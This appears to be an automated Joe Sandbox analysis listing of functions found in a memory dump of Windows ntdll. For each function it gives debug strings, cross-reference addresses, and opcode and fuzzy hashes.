                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-1918872054
                                                                  • Opcode ID: 663925d11f8f5d2cdb965e2f13574f2a0c21177bf68ec5c9a2403e94c9e9fc05
                                                                  • Instruction ID: 9d500fbd2c6115ece36ee86234df3616905eb9d182d2e4d079db09bf434b64ee
                                                                  • Opcode Fuzzy Hash: 663925d11f8f5d2cdb965e2f13574f2a0c21177bf68ec5c9a2403e94c9e9fc05
                                                                  • Instruction Fuzzy Hash: A0917D72509745AFD721CF61CC80FABB7E8BF84748F40092EF694A2151E774DA49CBA2
                                                                  Function 2CDE0C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 2CE354ED
                                                                  • HEAP[%wZ]: , xrefs: 2CE354D1, 2CE35592
                                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 2CE355AE
                                                                  • HEAP: , xrefs: 2CE354E0, 2CE355A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                  • API String ID: 0-1657114761
                                                                  • Opcode ID: 5975dbc04681145ce27350f14b6b2de5de3f896b1e0ff7b8eeef249c6ae54850
                                                                  • Instruction ID: 8448db47affe41387019c20182bdbfa8783c5b8e4b0fde71d261d0ff735ea0db
                                                                  • Opcode Fuzzy Hash: 5975dbc04681145ce27350f14b6b2de5de3f896b1e0ff7b8eeef249c6ae54850
                                                                  • Instruction Fuzzy Hash: D9A1F03060564AABD714CF64C880BAAB7F5FF54300F94816DD88A8B762D734F985DBA0
                                                                  Function 2CE0273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • SXS: %s() passed the empty activation context, xrefs: 2CE421DE
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 2CE422B6
                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 2CE421D9, 2CE422B1
                                                                  • .Local, xrefs: 2CE028D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                  • API String ID: 0-1239276146
                                                                  • Opcode ID: 3cd4df24673cfa665ee69fe6c6fa442263864a794d887bad7ac43a67e4cdab6d
                                                                  • Instruction ID: 52fd6d7ace9fa964749353464dd7cb70b4583b88be5d5f65a9e332295b1e7d6c
                                                                  • Opcode Fuzzy Hash: 3cd4df24673cfa665ee69fe6c6fa442263864a794d887bad7ac43a67e4cdab6d
                                                                  • Instruction Fuzzy Hash: 73A19A35D0522A9BCB21CF64D884BA9B3B4BF58318F2141EAD948BB251D7309EC5CF94
                                                                  Function 2CE04AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 2CE43437
                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 2CE4342A
                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 2CE43456
                                                                  • RtlDeactivateActivationContext, xrefs: 2CE43425, 2CE43432, 2CE43451
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                  • API String ID: 0-1245972979
                                                                  • Opcode ID: 3c659316dd918d3c735930c8e77ca413d96308463a2a949a937a24e981a04ec0
                                                                  • Instruction ID: 7a37721b6f05d05f067db80b337f53cad35b7f49c66ff57e9bf50250ac3bfb0c
                                                                  • Opcode Fuzzy Hash: 3c659316dd918d3c735930c8e77ca413d96308463a2a949a937a24e981a04ec0
                                                                  • Instruction Fuzzy Hash: F6615672A09A529BD322CF19D981F5AB3E1EF80754F20461DF859BB250D734E941CBD1
                                                                  Function 2CDD64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 2CE31028
                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 2CE310AE
                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 2CE3106B
                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 2CE30FE5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                  • API String ID: 0-1468400865
                                                                  • Opcode ID: 7ce180a80faf546252a9b30c2f7ba926dc9bd599085b74d04bcd0b4041c17161
                                                                  • Instruction ID: 5579bbc5ae1688588fbda694eb9cde9f7ffe37ce3da43732a32169d7e697d562
                                                                  • Opcode Fuzzy Hash: 7ce180a80faf546252a9b30c2f7ba926dc9bd599085b74d04bcd0b4041c17161
                                                                  • Instruction Fuzzy Hash: 5C71CCB69083059FC710CF15C884F8B7BA8AF94764F01096CF9489B296D335E6CACBD2
                                                                  Function 2CE04D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 2CE43640, 2CE4366C
                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 2CE4362F
                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 2CE4365C
                                                                  • LdrpFindDllActivationContext, xrefs: 2CE43636, 2CE43662
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                  • API String ID: 0-3779518884
                                                                  • Opcode ID: 3b23af92e9fdbad282adaccded7e2bd146a2b34cad62de7729a83a965cb6c72f
                                                                  • Instruction ID: 726a26f430a6551fb3e4bdc482b81987364199f59f9f7c12c58d856731c4cd76
                                                                  • Opcode Fuzzy Hash: 3b23af92e9fdbad282adaccded7e2bd146a2b34cad62de7729a83a965cb6c72f
                                                                  • Instruction Fuzzy Hash: EC314C33D05213AFDB21EB05DA88F5AB2B4BF0225CF12426AE50977161EB64DF84C7D5
                                                                  Function 2CDF245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 2CE3A992
                                                                  • apphelp.dll, xrefs: 2CDF2462
                                                                  • LdrpDynamicShimModule, xrefs: 2CE3A998
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 2CE3A9A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-176724104
                                                                  • Opcode ID: 89cb9b3c209eceafb3277b00bb20df73f7cdebbe5e82784d05da0d77f207f312
                                                                  • Instruction ID: 04d872010296b4b722b23e0b7e5b8a8fb5a6382fab0a9c9a22e7decb723473da
                                                                  • Opcode Fuzzy Hash: 89cb9b3c209eceafb3277b00bb20df73f7cdebbe5e82784d05da0d77f207f312
                                                                  • Instruction Fuzzy Hash: 5A312773B40201ABD7109F99C880EEAB7B8FB80704F12416DE95567261C778ABC6C790
                                                                  Function 2CDE29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 2CDE327D
                                                                  • HEAP[%wZ]: , xrefs: 2CDE3255
                                                                  • HEAP: , xrefs: 2CDE3264
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                  • API String ID: 0-617086771
                                                                  • Opcode ID: debb4d9a2a2198afbe84f4f66cf9a94ef85de7b70d2f763c4859ff4d53fc4ac3
                                                                  • Instruction ID: 14c839bc92a9b1084352554bca43983105d5b4696772d2037c787f13e110b03a
                                                                  • Opcode Fuzzy Hash: debb4d9a2a2198afbe84f4f66cf9a94ef85de7b70d2f763c4859ff4d53fc4ac3
                                                                  • Instruction Fuzzy Hash: 1192BB71A086499FDB15CF69C440BAEBBF1FF48310F1481ADE88DAB2A1D735A985CF50
                                                                  Function 2CDE0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-4253913091
                                                                  • Opcode ID: 2e9ebabe58bea20d5dc89e6cd74378b6c27baaacf19bd1243c3d2ad56e584952
                                                                  • Instruction ID: d6a05c081e8db213a4571621c88ca4e5593771aab44ed1781dd201304593a2ec
                                                                  • Opcode Fuzzy Hash: 2e9ebabe58bea20d5dc89e6cd74378b6c27baaacf19bd1243c3d2ad56e584952
                                                                  • Instruction Fuzzy Hash: 97F1A871605606DFDB15CF69C880FAAB7B5FF44304F1482A9E84A9B3A1D734FA81DB90
                                                                  Function 2CDF6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $@
                                                                  • API String ID: 0-1077428164
                                                                  • Opcode ID: 674f0a729de5dadcada2e9c0859b780db29af0460823b7ac5a252dcf57c4fb28
                                                                  • Instruction ID: 08e61f08b794dd19c940f8dce543cd342ce0570a1935090b4b35d0b6e877fcd5
                                                                  • Opcode Fuzzy Hash: 674f0a729de5dadcada2e9c0859b780db29af0460823b7ac5a252dcf57c4fb28
                                                                  • Instruction Fuzzy Hash: 6AC2CC7160D7419FD725CF24C880BABBBE5BF88704F068A2DE9C987261D734D945CBA2
                                                                  Function 2CDF0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrpCheckModule, xrefs: 2CE3A117
                                                                  • Failed to allocated memory for shimmed module list, xrefs: 2CE3A10F
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 2CE3A121
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-161242083
                                                                  • Opcode ID: ed91c7f5298bd2cdbebc97ef64b7ea74255fb34f661f3a1b4f16f59ad09f7a7b
                                                                  • Instruction ID: 50fe5a0329d652c4d6e5b66691f58781c31fb80d9071814aa083e844c2f01eed
                                                                  • Opcode Fuzzy Hash: ed91c7f5298bd2cdbebc97ef64b7ea74255fb34f661f3a1b4f16f59ad09f7a7b
                                                                  • Instruction Fuzzy Hash: 1E71CFB2A002059FDB04DFA8C990EAEB7F4FB54304F56402DD956E7261E738AF85CB91
                                                                  Function 2CDE0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-1334570610
                                                                  • Opcode ID: 7f985c46e0737af1366abbbb0d1e4fbc6e11916ffe2b2728a45bdf922be4eb38
                                                                  • Instruction ID: 38ec0434da5550fb3fc2e2c3ad1284102baa5c7cab18c45496038b1d7ee5ece6
                                                                  • Opcode Fuzzy Hash: 7f985c46e0737af1366abbbb0d1e4fbc6e11916ffe2b2728a45bdf922be4eb38
                                                                  • Instruction Fuzzy Hash: 3F619A70605345DFD718CF24C480BAABBE5FF45304F54856EE8998F2A6D770E981CB91
                                                                  Function 2CDCCCC8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 2CDCCD34
                                                                  • @, xrefs: 2CDCCD63
                                                                  • InstallLanguageFallback, xrefs: 2CDCCD7F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                  • API String ID: 0-1757540487
                                                                  • Opcode ID: 5b50befe1537acc91bbfa58bc1e26febb4b848bee3b2fd29e9c11e1eec84b4f0
                                                                  • Instruction ID: 097a39426744c3add886f847568af7cceaf76fa5bbb66752482974e0f0d23c26
                                                                  • Opcode Fuzzy Hash: 5b50befe1537acc91bbfa58bc1e26febb4b848bee3b2fd29e9c11e1eec84b4f0
                                                                  • Instruction Fuzzy Hash: 7251F6765097969BD700CF24C454BABB7E8AF88718F10092EFA84E7260E730DE48C763
                                                                  Function 2CE0C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 2CE482DE
                                                                  • Failed to reallocate the system dirs string !, xrefs: 2CE482D7
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 2CE482E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-1783798831
                                                                  • Opcode ID: e87c6d474d987e865e839d57558770f2f17a555a0d391e5f325a5ec48f3c708a
                                                                  • Instruction ID: 2317ea834ccaaf1c295d9e1967c7f798909c5db8ba4c1cc73eaa443ab4721435
                                                                  • Opcode Fuzzy Hash: e87c6d474d987e865e839d57558770f2f17a555a0d391e5f325a5ec48f3c708a
                                                                  • Instruction Fuzzy Hash: 2B41F0B2605700EBC721DB34DC40F8B77F8AF54654F04492AF959E3260EB74DA48CBA6
                                                                  Function 2CE54755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 2CE54888
                                                                  • LdrpCheckRedirection, xrefs: 2CE5488F
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 2CE54899
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-3154609507
                                                                  • Opcode ID: 61de92ec3d0903785ab6fe0b6ceecfa7af06f40c230545ac0415bb864f03a4c6
                                                                  • Instruction ID: 1ad049931435993c54cb6f4c5989de70fc9d69774ddd9ce44ac7419e9fc4624c
                                                                  • Opcode Fuzzy Hash: 61de92ec3d0903785ab6fe0b6ceecfa7af06f40c230545ac0415bb864f03a4c6
                                                                  • Instruction Fuzzy Hash: 3341BF32A097519FCB11CF69C840E577BE4AF8A698F120669FD58BB311E734E910CB91
                                                                  Function 2CDE0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-2558761708
                                                                  • Opcode ID: 53bc261f5af17a20b7cceecddc059fd027ac52ae67399bc1b48d988587085b93
                                                                  • Instruction ID: 397589baee8bfc5e0f3ff4a2d46403c0d3c0d15b3a50561abea39bb21c5070da
                                                                  • Opcode Fuzzy Hash: 53bc261f5af17a20b7cceecddc059fd027ac52ae67399bc1b48d988587085b93
                                                                  • Instruction Fuzzy Hash: 5C11DF3131A1829FD708D614C880F7AB3A8EF41619F54826DE80ACB261DB34F985E791
                                                                  Function 2CE520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrpInitializationFailure, xrefs: 2CE520FA
                                                                  • Process initialization failed with status 0x%08lx, xrefs: 2CE520F3
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 2CE52104
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-2986994758
                                                                  • Opcode ID: 3ed270e0bb41bb6e7ae75cc7142a929ca9ed8ed2540512bc2f5817307feabd83
                                                                  • Instruction ID: 4fcd8526f0fb906c6b400055761691988fe691e0716d1c3dde7ad87149c6ee88
                                                                  • Opcode Fuzzy Hash: 3ed270e0bb41bb6e7ae75cc7142a929ca9ed8ed2540512bc2f5817307feabd83
                                                                  • Instruction Fuzzy Hash: 28F04637601208BBE710D708CD82FDB77A8EB40798F100028F6057B281D2B0AB45DA80
                                                                  Function 2CE5CEA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 2CE5CFBD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: CallFilterFunc@8
                                                                  • String ID: @
                                                                  • API String ID: 4062629308-2766056989
                                                                  • Opcode ID: 0e2d42a71358b5655f9d000bef13a2849dd8ee32707a1cc83554b73fb406effd
                                                                  • Instruction ID: f17228f7b9fd656c0fa3622d9fa84353c9d22796a0d75151c872b3bd361a869d
                                                                  • Opcode Fuzzy Hash: 0e2d42a71358b5655f9d000bef13a2849dd8ee32707a1cc83554b73fb406effd
                                                                  • Instruction Fuzzy Hash: 1841C271900254DFCB218F94C980AEEBBF9FF55754F10402EE919EB264D734CA45CB65
                                                                  Function 2CDDA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrResSearchResource Exit, xrefs: 2CDDAA25
                                                                  • LdrResSearchResource Enter, xrefs: 2CDDAA13
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                  • API String ID: 0-4066393604
                                                                  • Opcode ID: f7644c646c075726dc36b2dfe26ecbffb3ecf35e8f22bd62143a9f269a92eb36
                                                                  • Instruction ID: 7c7948b525deed22e71bab7cea6d619c4a6d047dc4f49d7f0d619e51e0b3c044
                                                                  • Opcode Fuzzy Hash: f7644c646c075726dc36b2dfe26ecbffb3ecf35e8f22bd62143a9f269a92eb36
                                                                  • Instruction Fuzzy Hash: 5EE1BE73E45209AFEB11CF95CD80FEEB7B9AF44314F12926AE908E7261D7749A41CB10
                                                                  Function 2CE72F60 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • , xrefs: 2CE732B8
                                                                  • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 2CE73011
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                  • API String ID: 0-4088147954
                                                                  • Opcode ID: 41ac6be1386fb21c29c4397cf06ef3aa2f73309757aff2afbf715160c6126541
                                                                  • Instruction ID: abd15f0aecbb65ffb48892dacf00d29a62f2f89fc9f03d28acd6152f919d5667
                                                                  • Opcode Fuzzy Hash: 41ac6be1386fb21c29c4397cf06ef3aa2f73309757aff2afbf715160c6126541
                                                                  • Instruction Fuzzy Hash: 8EC10F726497419BD751CF21C880B5BB7F5BF88718F108A1DFA989B240EB70D98DCB92
                                                                  Function 2CE4E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Legacy$UEFI
                                                                  • API String ID: 2994545307-634100481
                                                                  • Opcode ID: 707934540bb44b9030ff7d64f94a92b57950c2e36ae933a7ac5228e22068079d
                                                                  • Instruction ID: e5a0471755c545282658f1617ac88b1b5347cb8520f4385605253a84fe8b24a8
                                                                  • Opcode Fuzzy Hash: 707934540bb44b9030ff7d64f94a92b57950c2e36ae933a7ac5228e22068079d
                                                                  • Instruction Fuzzy Hash: C3616A71E003589FDB25DFA8D880BAEFBB5FB48704F24402DE659EB291D735A944CB50
                                                                  Function 2CDDAC50 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrpResGetMappingSize Enter, xrefs: 2CDDAC6A
                                                                  • LdrpResGetMappingSize Exit, xrefs: 2CDDAC7C
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                  • API String ID: 0-1497657909
                                                                  • Opcode ID: f6347848f412befa376d9f961b028d2f48d76a27d580b84483957e3f5b2d3f09
                                                                  • Instruction ID: 6a4ee8f74114269b0f134af3fd957d2ae88a2e0ac74ffb2e52e2f6b977849f89
                                                                  • Opcode Fuzzy Hash: f6347848f412befa376d9f961b028d2f48d76a27d580b84483957e3f5b2d3f09
                                                                  • Instruction Fuzzy Hash: C061F033E496499FDB01CFA9C880B9DB7B4BF44715F15856EE908EB2A0E774D941C720
                                                                  Function 2CE04C59 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0$Flst
                                                                  • API String ID: 0-758220159
                                                                  • Opcode ID: 2920173011304282c896351c464d16f3170cddfe924fe01407ea384143ebf76d
                                                                  • Instruction ID: 33194bad6be2eef9362009f698a76d8febce3e679de62589c5ea6d6d792883e3
                                                                  • Opcode Fuzzy Hash: 2920173011304282c896351c464d16f3170cddfe924fe01407ea384143ebf76d
                                                                  • Instruction Fuzzy Hash: 6E519DB2E042098FCB25CF9AD684B99FBF4EF44718F14816ED049AB251E774DA85CB80
                                                                  Function 2CDD04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                  Download Yara Rule
